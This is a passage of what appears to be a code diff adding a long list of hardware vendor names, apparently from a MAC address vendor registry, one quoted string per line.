Communications", + "Saf Drive Systems, Ltd.", + "Nokia Multimedia Terminals", + "Matsushita Electronic Instruments Corp.", + "Surtec Industries, Inc.", + "FAR SYSTEMS S.p.A.", + "Compuware Corporation", + "Nbx Corporation", + "Gec Avery, Ltd.", + "LOGISTISTEM s.r.l.", + "Eastern Electronic Co., Ltd.", + "Emerson Network Power, Avocent Division", + "Sphere Communications, Inc.", + "A-Trend Technology Co., Ltd.", + "Proxima Corporation", + "Mii", + "Data Labs, Inc.", + "Motorola", + "Diba, Inc.", + "Horner Electric, Inc.", + "Bcom Electronics Inc.", + "Marel Hf", + "Utstarcom", + "Jaton Corporation", + "Excellent Computer", + "GRETACODER Data Systems AG", + "Rapid City Communications", + "Innovat Communications, Inc.", + "Jaycor", + "ESAOTE S.p.A.", + "Datax Nv", + "Technical Corp.", + "Memorex Telex Japan, Ltd.", + "Compulite R&D", + "ComCore Semiconductor, Inc.", + "Heiwa Corporation", + "Shimadzu Corporation", + "EXXACT GmbH", + "AutomatedLogic Corporation", + "Aurora Technologies, Inc.", + "Performance Telecom Corp.", + "VPNet, Inc.", + "Superior Modular Products", + "KeunYoung Electronics & Communication Co., Ltd.", + "Whistle Communications Corp.", + "Schlumberger Technologies Retail Petroleum Systems", + "StreamLogic", + "Cary Peripherals Inc.", + "Conservation Through Innovation Ltd.", + "Stellar One Corporation", + "Diamond Lane Communications", + "Land Computer Co., Ltd.", + "Arescom", + "Mesa Electronics", + "Cyclades Corporation", + "Arbin Instruments", + "Midas Lab, Inc.", + "Eldat Communication Ltd.", + "GEW Technologies (PTY)Ltd", + "Netcomm Limited", + "Ancot Corp.", + "Gesytec Mbh", + "Lasergraphics, Inc.", + "Netvision Corporation", + "Kofax Image Products", + "Stanilite Electronics Pty. Ltd", + "Myriad Logic Inc.", + "Acacia Networks, Inc.", + "Infotek Communications, Inc.", + "Compact Devices, Inc.", + "Advanced Peripherals Technologies, Inc.", + "Voelker Technologies, Inc.", + "Novalink Technologies, Inc.", + "Randata", + "Controlware Gmbh", + "Mpl Ag", + "AstroNova, Inc", + "Ntp Elektronik A/S", + "PERIPHERALS ENTERPRISE CO., Ltd.", + "Sts Technologies, Inc.", + "Comsat Corporation", + "Lucidata Ltd.", + "Process Control Corp.", + "Tv/Com International", + "Daniel Instruments, Ltd.", + "Transys Networks Inc.", + "Stallion Technologies", + "Sord Computer Corporation", + "Tidomat Ab", + "Isa Co., Ltd.", + "Netcs Informationstechnik Gmbh", + "Spectra - Tek", + "Transitions Research Corp.", + "Reuters Holdings Plc", + "Netcorp", + "Scitex Digital Printing, Inc.", + "Broadband Technologies", + "Leeds & Northrup Australia Pty Ltd", + "Optiquest", + "Nashoba Networks", + "Azonix Corporation", + "Unicomputer Gmbh", + "Airspan", + "Network Services Group", + "Tennyson Technologies Pty Ltd", + "K-Net Ltd.", + "Transmitton Ltd.", + "Conner Peripherals", + "Ictv", + "Citicorp/Tti", + "Marconi Communication GmbH", + "Ark Telecommunications, Inc.", + "Cypress Semiconductor", + "Ecessa", + "Whitetree Network", + "Kingmax Technology, Inc.", + "Hilan Gmbh", + "Applicom International", + "Teknor Microsysteme, Inc.", + "Microtech Electronics Limited", + "T.c. Technologies Pty. Ltd", + "GKD Gesellschaft Fur Kommunikation Und Datentechnik", + "Ragula Systems", + "Topware Inc. / Grand Computer", + "Fusion Systems Corporation", + "Namaqua Computerware", + "Mcd Kencom Corporation", + "Diversified Technology, Inc.", + "Micro Industries Corp.", + "Redcom Labs Inc.", + "B810 S.r.l.", + "J B M Corporation", + "Axel", + "DRS Signal Solutions", + "Micron Technology, Inc.", + "Cmd Technology", + "Cybertec Pty Ltd", + "Lidkoping Machine Tools Ab", + "Central Data Corporation", + "Amkly Systems, Inc.", + "Supernet Networking Inc.", + "Ohler Gmbh", + "Brown's Operating System Services, Ltd.", + "WiSE Communications, Inc.", + "LogiCan Technologies, Inc.", + "Allied Signal Inc.", + "Chevin Software Eng. Ltd.", + "Ersat Electronic Gmbh", + "Excel, Inc.", + "Kyoei Sangyo Co., Ltd.", + "Computer Identics", + "Katana Products", + "Ciprico, Inc.", + "Kentrox, LLC", + "Ost (Ouest Standard Telematiqu", + "Net Tek And Karlnet, Inc.", + "Gateway Devices, Inc.", + "N.v. Dzine", + "Presticom Incorporated", + "Victron Bv", + "Kardios Systems Corp.", + "Applied Signal Technology", + "Elsag Bailey Process", + "Bay Technical Associates", + "Psitech, Inc.", + "Design Research Systems, Inc.", + "Racal-Datacom", + "Cable & Computer Technology", + "Norcontrol A.s.", + "Prosum", + "I-Data International A-S", + "Blue Chip Technology Ltd", + "Telematics Calabasas Int'l,Inc", + "Olivetti Telecom Spa (Olteco)", + "Interactive Computing Devices", + "Fa. Gebr. Heller Gmbh", + "Id Scandinavia As", + "Nectec", + "Cache Computers, Inc.", + "Gambit Computer Communications", + "Transaction Network", + "Alta Research Corp.", + "Centrum Communications, Inc.", + "Arnos Instruments & Computer", + "Ubitrex Corporation", + "Telmat Informatique", + "Isis Distributed Systems, Inc.", + "Silcom Manuf'g Technology Inc.", + "Network Peripherals, Ltd.", + "Lasermaster Technologies, Inc.", + "Dataproducts Corporation", + "KYE Systems Corp.", + "Metacomp, Inc.", + "Jabil Circuit, Inc.", + "Distributed Systems Int'l, Inc", + "Oak Solutions, Ltd.", + "Sid Informatica", + "Advanced Integration Research", + "Electronics For Imaging, Inc.", + "Docupoint, Inc.", + "Fuji Photo Film Co., Ltd.", + "Inex Technologies, Inc.", + "Ekf Elektronik Gmbh", + "Archipel Sa", + "Japan Business Computer Co.ltd", + "Silicon Valley Computer", + "Norand Corporation", + "Advanced Technology Labs", + "Strawberry Tree, Inc.", + "Maxton Technology Corporation", + "Gerloff Gesellschaft Fur", + "Funasset Limited", + "Windata, Inc.", + "Sartorius Mechatronics T&H GmbH", + "Channel Systems Intern'l Inc.", + "Icc", + "Network Express, Inc.", + "Shographics, Inc.", + "Mesa Ridge Technologies, Inc.", + "Kinkei System Corporation", + "Klever Computers, Inc.", + "Cable And Wireless", + "Idea Associates", + "Charles River Data Systems,Inc", + "Vista Controls Corporation", + "Hirakawa Hewtech Corp.", + "Dynatem", + "Tda Industria De Produtos", + "Star-Tek, Inc.", + "A Plus Info Corporation", + "Video Technology Computers Ltd", + "Bass Associates", + "Extension Technology Corp.", + "Telecommunications Techniques", + "Lannet Data Communications,Ltd", + "Fantum Engineering", + "Aitech Systems Ltd.", + "Picker International", + "Advance Micro Research, Inc.", + "Aeon Systems, Inc.", + "Boeing Defense & Space", + "Corollary, Inc.", + "Sun Conversion Technologies", + "Lanwan Technologies", + "Systemforschung", + "C.a.e.n.", + "Sonic Systems, Inc.", + "First Internat'l Computer, Inc", + "Raylan Corporation", + "Hypercom, Inc.", + "Paxdata Networks Ltd.", + "Saab Instruments Ab", + "Logic Corporation", + "MicroBrain,Inc.", + "Meidensha Corporation", + "Metronix Gmbh", + "Smc Massachusetts, Inc.", + "Twinhead Corporation", + "Rose Electronics", + "Datamedia Corporation", + "Pep Modular Computers Gmbh", + "Sai Technology", + "Tdk Corporation", + "Tatung Company", + "Peer Networks, Inc.", + "Xtp Systems, Inc.", + "Integrated Marketing Co", + "Ascom Infrasys Ag", + "SPHINX Electronics GmbH & Co KG", + "Basys, Corp.", + "Varityper, Inc.", + "Victor Company Of Japan, Ltd.", + "Periphonics Corporation", + "Centralp Automatismes", + "Veb Kombinat Robotron", + "Newport Systems Solutions", + "Basic Merton Handelsges.m.b.h.", + "Graphon Corporation", + "Datus Gmbh", + "Nippon Steel Corporation", + "Commodore International", + "Cadre Technologies", + "Kodiak Technology", + "Shiva Corp.", + "Aval Data Corporation", + "Matsushita Electric Ind. Co", + "Network Products", + "Computadoras Micron", + "Dynatech Computer Systems", + "In2 Groupe Intertechnique", + "Alcatel Stc Australia", + "Integrated Business Networks", + "Schmid Telecommunication", + "Stanley Electric Co., Ltd", + "Netcom Research Incorporated", + "Asante Technologies", + "Microcom", + "Nicolet Instruments Corp.", + "Hcl Limited", + "Raytheon", + "Microtest, Inc.", + "Clearpoint Research", + "Heurikon Corporation", + "In-Net Corp.", + "Square D Company", + "Takaoka Electric Mfg. Co. Ltd.", + "Pfu Limited", + "Mizar, Inc.", + "Marquette Electric Co.", + "Diamond Sales Limited", + "Telematics International Inc.", + "Conware Computer Consulting", + "Sha-Ken Co., Ltd.", + "Micro-Matic Research", + "Lectra Systemes Sa", + "Crisp Automation, Inc", + "Miniware Technology", + "Olivetti North America", + "Cryptek Inc.", + "i Controls, Inc.", + "Crosscomm Corporation", + "Eon Systems", + "Infotron", + "Spectragraphics Corporation", + "Sureman Comp. & Commun. Corp.", + "Hob Electronic Gmbh & Co. Kg", + "Network Computing Devices Inc.", + "Vg Laboratory Systems Ltd", + "Dataindustrier Diab Ab", + "Dana Computer Inc.", + "Ford Aerospace & Comm. Corp.", + "Rolm Mil-Spec Computers", + "Ampere Incorporated", + "Matra (Dsie)", + "Suntek Technology Int'l", + "ComDesign", + "Gould Inc.", + "Vta Technologies Inc.", + "Rosemount Controls", + "Isicad, Inc.", + "Ameristar Technologies Inc.", + "Integrated Micro Products Ltd", + "Bruker Instruments Inc.", + "Wang Laboratories Inc.", + "Develcon Electronics Ltd.", + "Proteon Inc.", + "Evans & Sutherland", + "Astech Inc.", + "Cimlinc Incorporated", + "Magna Computer Corporation", + "Xmit Ag Computer Networks", + "Tektronix Inc.", + "National Semiconductor", + "Able Communications Inc.", + "Lan-Tec Inc.", + "Norsk Data A.s.", + "Control Data", + "Dartmouth College", + "Henan Thinker Rail Transportation Research Inc.", + "Advanced Computer Comm.", + "Miklyn Development Co.", + "Telecom Infra Project", + "Legrand INTELLIGENT ELECTRICAL(HUIZHOU)CO.,LTD.", + "MCS Logic", + "Adva Network Security GmbH", + "Bopel Mobile Technology Co.,Limited", + "LIMNO Co., Ltd.", + "Foxtron Vehicle Technologies Co., Ltd.", + "Havis Inc.", + "Humax Networks", + "Shenzhen Topwell Technology Co., Ltd.", + "Shenzhen CPETEK Technology Co.,Ltd.", + "Ascendent Technology Group", + "Ennoconn Corporation.", + "Marquardt Schaltsysteme SCS", + "August Internet Limited", + "cellXica ltd", + "zhejiang Dusun Electron Co.,Ltd", + "Ugreen Group Limited", + "Netis Technology Co., Ltd.", + "Shenzhen Chilink IoT Technology Co., Ltd.", + "Cear, Inc.", + "Provision-ISR", + "Rulogic Inc.", + "sywinkey HongKong Co,. Limited?", + "Touchstar ATC Limited", + "NXP Semiconductors Taiwan Ltd.", + "Intertech Services AG", + "Sentry Equipment Corp.", + "Guangdong Juan Intelligent Technology Joint Stock Co., Ltd.", + "Shenzhen Along Electronics Co., Ltd", + "Wistron InfoComm(Chongqing)Co.,Ltd.", + "Butlr Technologies, Inc.", + "Rigaku Corporation Osaka Plant", + "GDN Enterprises Private Limited", + "Hubei Yangtze Mason Semiconductor Technology Co., Ltd.", + "Thinkcar Tech Co.,Ltd.", + "Orbic North America", + "Pixel FX", + "Apption Labs Ltd", + "PROX SG Pte Ltd", + "TPV Display Technology (Xiamen) Co.,Ltd.", + "Qidi Technology (shanghai) Co.,Ltd.", + "Sinepower Lda", + "Fantasia Trading LLC", + "Shanghai Notion lnformatio Technology Co.,Ltd.", + "Chengdu Yocto Communication Technology Co.Ltd.", + "Daimler Truck AG", + "LEAPS s.r.o.", + "ifanr Inc", + "Software Freedom Conservancy", + "Shenzhen Jingxun Technology Co., Ltd.", + "Hangzhou Anysoft Information Technology Co. , Ltd", + "Beijing Winner Microelectronics Co.,Ltd.", + "Project Monitor Inc", + "ecamtek", + "Shenzhen Jiahua Zhongli Technology Co., LTD", + "Prove", + "Ningbo Qixiang Information Technology Co., Ltd", + "Solar Manager AG", + "Shenzhen SSC Technology Co. Ltd", + "Mavenir Ipa Uk Ltd", + "Flextronics International Kft", + "Always On Tech Pte.ltd.", + "Klipsch Group, Inc.", + "Linksys USA, Inc", + "Guangzhou Yuandianhe Communication Technology Co.,Ltd", + "Dense Air Networks US LLC", + "Nanjing Xinlian Electronics Co., Ltd", + "AsiaTelco Technologies Co.", + "Future Designs, Inc.", + "Digisol Systems Limited", + "AiFamous(shenzhen)Technology Co.,Ltd", + "Abietec Inc.", + "Quanergy Solutions Inc", + "Beijing Gctech Technology Co.,LTD", + "G.Tech Technology Ltd.", + "Funtime Pickleball Inc.", + "Dongguan Mentech Optical & Magnetic Co., Ltd.", + "Vivint Inc", + "Shenzhen Xunman Technology Co., Ltd", + "Daikin Europe NV", + "Trident IoT", + "GooWi Wireless Technology Co., Limited", + "China Post Communication Equipment Co.,", + "Guangzhou Gizwits loT Technology Co.,Ltd", + "Tozed Kangwei Tech Co.,Ltd", + "Hosenso GmbH & Co. KG", + "Phoenix Contact GmbH & Co. KG", + "Lylink Limited", + "Brain Corporation", + "Beijing Netswift Technology Co.,Ltd.", + "Shenzhen G-world Technology Incorporated Company", + "Luminator Technology Group Global LLC", + "Nexthop Systems Inc.", + "PiLink Co., Ltd.", + "Qualfiber Technology Co.,Ltd", + "Avigilon Alta", + "Dji Baiwang Technology Co Ltd", + "Nicent Technology Co., Ltd.", + "STK Technology Co., Ltd.", + "Pascal Audio", + "ASIX Electronics Corporation", + "MultiTracks.com, LLC", + "Xsight Labs LTD.", + "TASKING Labs", + "Genstoraige Technology Co.ltd.", + "Shanghai Ingeek Technology Co., Ltd", + "Sector Alarm Tech S.L.", + "TOP WING Corporation", + "snom technology GmbH", + "Brain Technologies, Inc.", + "IYO, Inc", + "TKH Security B.V.", + "INSYS icom GmbH", + "Esconet Technologies Limited", + "Chauvet", + "Forecr OU", + "Charles Industries", + "Fast Photonics Hk Co., Limited", + "Zabbly", + "Infrawaves", + "maxon zub", + "Chongqing ZQZER Technology Co., LTD", + "Guangxi Konaixin Precision Technology Co., Ltd", + "Hyundai Wia", + "Lysora Technology Inc.", + "Zhejiang Huayi IOT Technology Co.,Ltd", + "Forum Communication Systems, Inc", + "Infraeo Inc", + "Nexaiot", + "Shenzhen Sundray Technologies company Limited", + "Vantiva - Connected Home", + "Beijing BitIntelligence Information Technology Co. Ltd.", + "TeamF1 Networks Pvt Limited", + "Jizaie inc.", + "BWS IoT", + "Inseego Wireless, Inc", + "Yingling Innovations Pte. Ltd.", + "Rong-Paisa Electronics Co., Ltd.", + "Chameleon Technology (UK) Limited", + "Compal Information(Kunshan)Co.,Ltd.", + "Nexus Raytek Pty Ltd", + "Sapphire Brands Limited", + "RADiflow", + "Barco NV", + "Everybot Inc.", + "Shenzhen Transchan Technology Limited", + "Xiamen Jiwu Technology CO.,Ltd", + "SY Electronics Ltd", + "Ele(Group)Co.,Ltd", + "Fiberx Distribuidora De Produtos De Telecomunicacao Ltda", + "EverCharge", + "NCKOREA Co.,Ltd.", + "Tejas Networks Ltd", + "Zhejiang SUPCON Technology Co., Ltd.", + "STL Systems AG", + "Lenovo Future Communication Technology (Chongqing) Company Limited", + "Safran Trusted 4D Inc.", + "weiyuantechnology", + "Tenet Networks Private Limited", + "EVK DI Kerschhaggl GmbH", + "Janz - Contagem e Gestão de Fluídos S.A.", + "Air-Weigh Incorporated", + "Han Chang", + "WuXi Rigosys Technology Co.,LTD", + "Amcrest Technologies", + "Enablers Solucoes e Consultoria em Dispositivos", + "Rinnai", + "China Unicom Online Information Technology Co.,Ltd", + "Starkey Labs Inc.", + "Insulet Corporation", + "MAGNETI MARELLI S.E. S.p.A.", + "ArrayComm", + "Dongguan Wecxw CO.,Ltd.", + "Pk Vega", + "Internet Initiative Japan, Inc", + "U.D.Electronic Corp.", + "Omnipless Manufacturing (PTY) Ltd", + "BizLink Technology (S.E.A) Sdn. Bhd.", + "Atraltech", + "Firmus Technologies Pty Ltd", + "Shanghai Linkyum Microeletronics Co.,Ltd", + "Zhanzuo (Beijing) Technology Co., Ltd.", + "solidotech", + "Beijing L&S Lancom Platform Tech. Co., Ltd.", + "IPG Laser GmbH", + "Neptune Technology Group Inc.", + "IKEA of Sweden AB", + "IOPSYS Software Solutions", + "Universal Biosensors Pty Ltd", + "Chongqing Zhouhai Intelligent Technology Co., Ltd", + "Maasiv, LLC", + "Shenzhen Belon Technology CO.,LTD", + "Yippee Electronics Co.,Limited", + "Recogni Inc", + "Chongqing Yipingfang Technology Co., Ltd.", + "Daniels Electronics Ltd. dba Codan Radio Communications", + "Ikotek technology SH Co., Ltd", + "AcSiP", + "Qualvision Technology Co.,Ltd", + "Alphabet Capital Sdn Bhd", + "BioIntelliSense, Inc.", + "Edistec", + "Guangzhou Ronsuo Electronic Technology Co.,Ltd", + "Dongguan Auklink TechnologyCo.,Ltd", + "TECNA SpA", + "Browan Communications Incorporation", + "NTN Technical Service Corporation", + "Huahao Fangzhou Technology Co.,Ltd", + "Robert Bosch GmbH AnP", + "Maipu Communication Technology Co.,Ltd.", + "Secure Letter Inc.", + "Onion Corporation", + "Shenzhen Changjin Communication Technology Co.,Ltd", + "Phonesuite", + "Zodianet", + "Eight Sleep", + "Toast, Inc.", + "Atw Technology, Inc.", + "Guangdong Nanguang Photo&Video Systems Co., Ltd.", + "Hangzhou DPtech Technologies Co., Ltd.", + "Redarc Electronics", + "Hangzhou Beilian Low Carbon Technology Co., Ltd.", + "PetroCloud LLC", + "HomeWizard B.V.", + "Telemonitor, Inc.", + "Stanley Black & Decker", + "TBT Inc.", + "Nanjing Powercore Tech Co.,Ltd", + "Protempis, LLC", + "Chengdu InnovaTest Technology Co., Ltd", + "Shenzhen Taike industrial automation company,Ltd", + "Fine Point-High Export", + "securityplatform", + "Suzhou PanKore Integrated Circuit Technology Co. Ltd.", + "Fujian Newland Communication Science Technology Co.,Ltd.", + "YUSUR Technology Co., Ltd.", + "34ED LLC DBA Centegix", + "Hyperloop Technologies, Inc dba Virgin Hyperloop", + "Shandong ZTop Microelectronics Co., Ltd.", + "nass magnet Hungária Kft.", + "Hk Dapu Electronic Technology Co., Limited", + "Siemens Numerical Control Ltd., Nanjing", + "Nanjing Decowell Automation Co.,LTD", + "Xiamen Cheerzing IOT Technology Co.,Ltd.", + "Wuhan Huazhong Numerical Control Co., Ltd", + "China Hualu Panasonic AVC Networks Co., LTD.", + "Shenzhen Chuangxin Internet Communication Technology Co., Ltd", + "Shanghai Hi-Tech Control System Co.,Ltd.", + "Infinera, Inc.", + "E.J Ward", + "Fujian Landi Commercial Technology Co., Ltd.", + "Beijing Starblaze Technology Co.,Ltd", + "Shanghai Junqian Sensing Technology Co.,LTD", + "Procenne Digital Security", + "ShenZhen OnMicro Electronics Co.,Ltd.", + "International Integrated Systems., Inc.", + "Shenzhen GainStrong Technology Co., Ltd.", + "GoodWe Technologies CO., Ltd", + "Made Studio Design Ltd.", + "Zhishang Chuanglian Technology Co., Ltd", + "Tri plus grupa d.o.o.", + "Cascination Ag", + "Shaanxi Gangsion Electronic Technology Co., Ltd", + "TGW Mechanics GmbH", + "Advanced Design Technology co.,ltd.", + "Wuhan Qianyang Iotian Technology Co., Ltd", + "Realtimeid As", + "E. Wehrle GmbH", + "Global Display Solutions Spa", + "Hangzhou Taili wireless communication equipment Co.,Ltd", + "silex technology, Inc.", + "QianTang Technology", + "Connected Home", + "JUHUA Technology Inc.", + "Shure Incorporated", + "WireStar Networks", + "GE Appliances", + "Grandprint(Beijing) Technology Co., LTD.", + "Trinnov Audio", + "Zhejiang Hising Technology Co.,Ltd", + "Huahao Kunpeng Technology (chengDu) Co.,Ltd.", + "Ajile Systems, Inc.", + "Observint Technologies, Inc.", + "Union Chip Technology Limited", + "Suzhou Denbom Electronic S&T Co., Ltd", + "Shenzhen INVT Electric CO.,Ltd", + "S-Bluetech co., limited", + "Shanghai Xiaodu Technology Limited", + "Armatura LLC", + "Invisible Fun Studio Limited", + "Chipsea Technologies(Shenzhen) Corp.", + "Securosys SA", + "THALES AVS France", + "SHINEMAN(SHENZHEN) Tech. Cor., Ltd.", + "Shoogee GmbH & Co. KG", + "Tongfang Computer Co.,Ltd.", + "Parker Hannifin Corporation", + "Guangzhou Sat Infrared Co.,LTD", + "EWM Hightec Welding GmbH", + "Honeywell SPS", + "ball-b GmbH Co KG", + "Xi'an Yipu Telecom Technology Co.,Ltd.", + "Airtech I&C Co., Ltd", + "LJU Automatisierungstechnik GmbH", + "Shenzhen Malio Technology Co.,Ltd", + "Sencore", + "STORDIS GmbH", + "Hunan Greatwall Computer System Co., Ltd.", + "ESSENCORE limited", + "Beyless", + "Ps Inodic Co., Ltd.", + "Ubyon Inc.", + "Nexar Ltd.", + "Goertek Inc.", + "Shanghai XinMiaoLink Technology Co., Ltd", + "Shenzhen KKM Co., Ltd", + "Dell Technologies", + "uGrid Network Inc.", + "Tecvan Informatica Ltda", + "Jabil Circuit de Chihuahua", + "TPVision Europe B.V", + "Jy Company", + "Cwd Innovation Limited", + "Landis+Gyr GmbH", + "Ansjer Electronics Co., Ltd.", + "hangzhou huacheng network technology co., ltd", + "Shenzhen NORCO lntelligent Technology Co.,Ltd", + "Beijing H-IoT Technology Co., Ltd.", + "Shenzhen Sande Dacom Electronics Co., Ltd", + "Alibaba cloud computing Co., Ltd", + "Kyolis", + "Express LUCK Industrial Ltd.", + "Ishida Medical Co., Ltd.", + "Shanghai Mountain View Silicon", + "Alinco,incorporated", + "Altos Computer Systems", + "Huizhou Tcl Communication Electron Co.,Ltd", + "Hongshan Information Science and Technology (HangZhou) Co.,Ltd.", + "RLTech India Private Limited", + "ICR, inc.", + "Shaanxi Ruixun Electronic Information Technology Co., Ltd", + "Meta System Spa", + "Eltec Elektronik Ag", + "BEKO Technologies GmbH", + "Cjsc Norsi-Trans", + "Kumahira Co., Ltd.", + "PESA Inc.", + "Kontakt Micro-Location Sp z o.o.", + "Beijing Huawoo Technologies Co.ltd", + "JAI Manufacturing", + "Hefei Symboltek Co.,Ltd", + "Micronet union Technology(Chengdu)Co., Ltd.", + "Trakm8 Ltd", + "Smarteh d.o.o.", + "myenergi Ltd", + "Olibra LLC", + "Seikosha Co., Ltd.", + "Technity Solutions Inc.", + "Beijing Yaxunhongda Technology Co., Ltd.", + "Wuhan Hosan Telecommunication Technology Co.,Ltd", + "MiraeSignal Co., Ltd", + "Wasp artificial intelligence(Shenzhen) Co.,ltd", + "LIONS Taiwan Technology Inc.", + "Nanwang Multimedia Inc.,Ltd", + "Leetek", + "Point Multimedia Systems", + "Dyson Limited", + "Shenzhen Netforward Micro-Electronic Co., Ltd.", + "Mapper.ai, Inc.", + "Nanoleaf", + "SYSTEMES ET TECHNOLOGIES IDENTIFICATION (STid)", + "Peloton Interactive, Inc", + "Innogrit Corporation", + "HuNan ZiKun Information Technology CO., Ltd", + "Wuxi Neihua Network Technology Co., Ltd", + "Shenzhen Dinghe Communication Company", + "DataRemote Inc.", + "Pensando Systems, Inc.", + "Shenzhen elink smart Co., ltd", + "SecuWorks", + "Rootous System Co.,Ltd", + "Discovergy GmbH", + "Lansen Systems AB", + "Zexelon Co., Ltd.", + "Mobiwire Mobiles (NingBo) Co., LTD", + "Amosense", + "Eolo SpA", + "SMG Holdings LLC", + "Citrix Systems, Inc.", + "AD.EL s.r.l.", + "Vector Sp. Z O.o.", + "Cooler Master Technology Inc", + "PCTEL, Inc.", + "Rock Path S.r.l", + "Join Digital, Inc.", + "Optimal Audio Ltd", + "Zengge Co., Limited", + "Leapfive Tech. Ltd.", + "Midmark RTLS", + "Shenzhen JRUN Technologies CO., LTD", + "Panasonic Electric Works Networks Co., Ltd.", + "Alps Electric (Ireland) Ltd", + "digitron", + "Shenzhen Delos Electronic Co., Ltd", + "Beijing Roborock Technology Co., Ltd.", + "AirVine Scientific, Inc.", + "shenzhen hemuwei technology co.,ltd", + "Shenzhen Kertong Technology Co.,Ltd", + "ANDREAS STIHL AG & Co. KG", + "Omnifi Inc.", + "Jiangsu Huacun Electronic Technology Co., Ltd.", + "Universal Remote Control, Inc.", + "Smart Cube., Ltd", + "Shenzhen Hongde Smart Link Technology Co., Ltd", + "Dasan Electron Co., Ltd.", + "Atop Technologies, Inc.", + "Shenzhen Deejoy Lighting Technology Co.,Ltd.", + "Daontec", + "Hangzhou Softel Optic Co., Ltd", + "Optictimes Co.,Ltd", + "Mobile Technology Solutions LLC", + "Sentinhealth", + "Zilog Inc.", + "Tymphany Acoustic Technology (Huizhou) Co., Ltd.", + "Cox Communications, Inc", + "Ao Gk Nateks", + "VitalThings AS", + "Jala Group", + "Arrival Elements BV", + "Zhong Shan City Richsound Electronic Industrial Ltd", + "Spacelink", + "Anova Applied Electronics, Inc.", + "JWEntertainment", + "Mfp Michelin", + "Herospeed Digital Technology Limited", + "Crescent Networks, Inc.", + "Shenzhen WIFI-3L Technology Co.,Ltd", + "Guangzhou Qi'an Technology Co., Ltd.", + "Guangzhou Tozed Kangwei Intelligent Technology Co., LTD", + "FMTech", + "Nanjing Ticom Tech Co., Ltd.", + "Netix Global B.V.", + "IXECLOUD Tech", + "ATOM tech Inc.", + "Cohesity Inc", + "ASE Group Chung-Li", + "Mimodisplaykorea", + "Convergens Oy Ltd", + "TOHO Electronics INC.", + "ALCATEL ITALIA S.p.A.", + "Rhino Mobility LLC", + "Inspur Group Co., Ltd.", + "Dover Fueling Solutions", + "Octagon Systems Corp.", + "McWane India Pvt Ltd", + "Tempo Communications", + "Tesla,Inc.", + "Crestron Electronics, Inc.", + "SolarEdge Technologies", + "Solid State Storage Technology Corporation", + "DASAN Networks, Inc.", + "Ncs Electrical Sdn Bhd", + "iryx corp", + "Sony Imaging Products & Solutions Inc.", + "AVPro Global Hldgs", + "Celona Inc.", + "IRay Technology Co., Ltd.", + "Bizlink Technology, Inc.", + "YUGE Information technology Co. Ltd", + "Cornami, Inc", + "AiNET", + "Subscriber Networks, Inc.", + "Anhui Dynamic Power Co., Ltd.", + "Totolink Technology Int‘l Limited", + "IPFLEX Inc.", + "Wuxi Funide Digital Co.,Ltd", + "Shenzhen Optfocus Technology.,Ltd", + "JTD Consulting", + "Tripwire Inc.", + "Teko", + "Crompton Instruments", + "Ingenic Semiconductor Co.,Ltd", + "Shanghai Engineering Science & Technology Co.,LTD CGNPC", + "Axonne Inc.", + "Inspur Software Group Ltd.", + "GW Technologies Co.,Ltd", + "EBG compleo GmbH", + "Futaba Corporation", + "JMACS Japan Co., Ltd.", + "Ava Security Limited", + "Adapt-IP", + "Hong Kong Bouffalo Lab Limited", + "ittim", + "Zhongxin Intelligent Times (Shenzhen) Co., Ltd.", + "COMMANDO Networks Limited", + "Career Technologies USA", + "Bytedance", + "Deeplet Technology Corp", + "Meter, Inc.", + "Nippon Seiki (Europe) B.V.", + "Tunstall Nordic AB", + "Botato Electronics Sdn Bhd", + "Structab AB", + "Genexis International B.V.", + "ONYX WIFI Inc", + "Reiner SCT", + "Ceragon Networks", + "Nestar Communications, Inc", + "this is engineering Inc.", + "Sinewy Technology Co., Ltd", + "Jfcontrol", + "Shenzhen Boomtech Industrial Corporation", + "Vibration Research Corporation", + "Spider Systems Limited", + "Nantong Coship Electronics Co., Ltd.", + "Beijing Zile Technology Co., Ltd", + "Titan DataCenters France", + "Shenzhen Think Will Communication Technology co., LTD.", + "W&G Special Products", + "Guangzhou Juan Intelligent Tech Joint Stock Co.,Ltd", + "Fujian LANDI Commercial Equipment Co.,Ltd", + "Wildlife Acoustics, Inc.", + "MyLight Systems", + "Tiny Mesh AS", + "Shenzhen Baitong Putian Technology Co.,Ltd.", + "varram system", + "KNS Group LLC (YADRO Company)", + "Wattty Corporation", + "DEVA Broadcast Ltd.", + "VOIM Co., Ltd.", + "SYRED Data Systems", + "Fontem Ventures BV", + "DarkMatter L.L.C", + "Haverford Systems Inc", + "CIS Crypto", + "Beijing National Railway Research & Design Institute of Signal & Communication Group Co..Ltd.", + "Seal Ag", + "Tecore Networks", + "McPay Co.,LTD.", + "Longcheer Telecommunication Limited", + "Tsat As", + "Toshiba Visual Solutions Corporation Co.,Ltd", + "Connex GmbH", + "Medea Corporation", + "Bosung Powertec Co.,Ltd.", + "Aedle Sas", + "Shenzhen Cannice Technology Co.,Ltd", + "Oriental Motor Co., Ltd.", + "Xcheng Holding", + "Actia Automotive", + "AO PKK Milandr", + "xvtec ltd", + "Ficosa Maroc International", + "Megapixel VR", + "Wideband Labs LLC", + "Mikotek Information Inc.", + "Fs Com Inc", + "Homa Technologies JSC", + "Vingroup Joint Stock Company", + "ITC Systems", + "Fresh AB", + "George Robotics Limited", + "Concern Axion JSC", + "Tianjin Beebox Intelligent Technology Co.,Ltd.", + "Kelvin Inc.", + "JENOPTIK Advanced Systems GmbH", + "SecuGen Corporation", + "Furrion Limited", + "Caavo Inc", + "Digital Products Limited", + "Shenzhen Colorful Yugong Technology and Development Co., Ltd.", + "TTE Corporation", + "GOEFER, Inc.", + "Wiscloud", + "Zurn Industries LLC", + "Xufeng Development Limited", + "Bitmain Technologies Inc", + "Xin Shi Jia Technology (Beijing) Co.,Ltd", + "Welotec GmbH", + "Schreder", + "Niko-Servodan", + "Beijing Jiaoda Microunion Tech.Co.,Ltd.", + "Chemoptics Inc.", + "Grandstream Networks, Inc.", + "Carl Zeiss AG", + "Shenzhen Zhixin Data Service Co., Ltd.", + "China Entropy Co., Ltd.", + "Jwcnetworks", + "Autobase", + "Qdis", + "Elster Water Metering", + "Continental Automotive Hungary Kft", + "Chengdu newifi Co.,Ltd", + "S.fac, Inc", + "Optonic GmbH", + "Vision Information & Communications", + "EIZO Corporation", + "Ecocom", + "Freescale Semiconductor", + "Comcam International Inc", + "WaveLynx Technologies Corporation", + "FADU, Inc.", + "Vertu International Corporation Limited", + "Superwave Group LLC", + "Nextek Solutions Pte Ltd", + "NamJunSa", + "Danal Entertainment", + "Birds Eye Systems Private Limited", + "IBT Ingenieurbureau Broennimann Thun", + "Magna Carta", + "x.o.ware, inc.", + "Aquantia Corporation", + 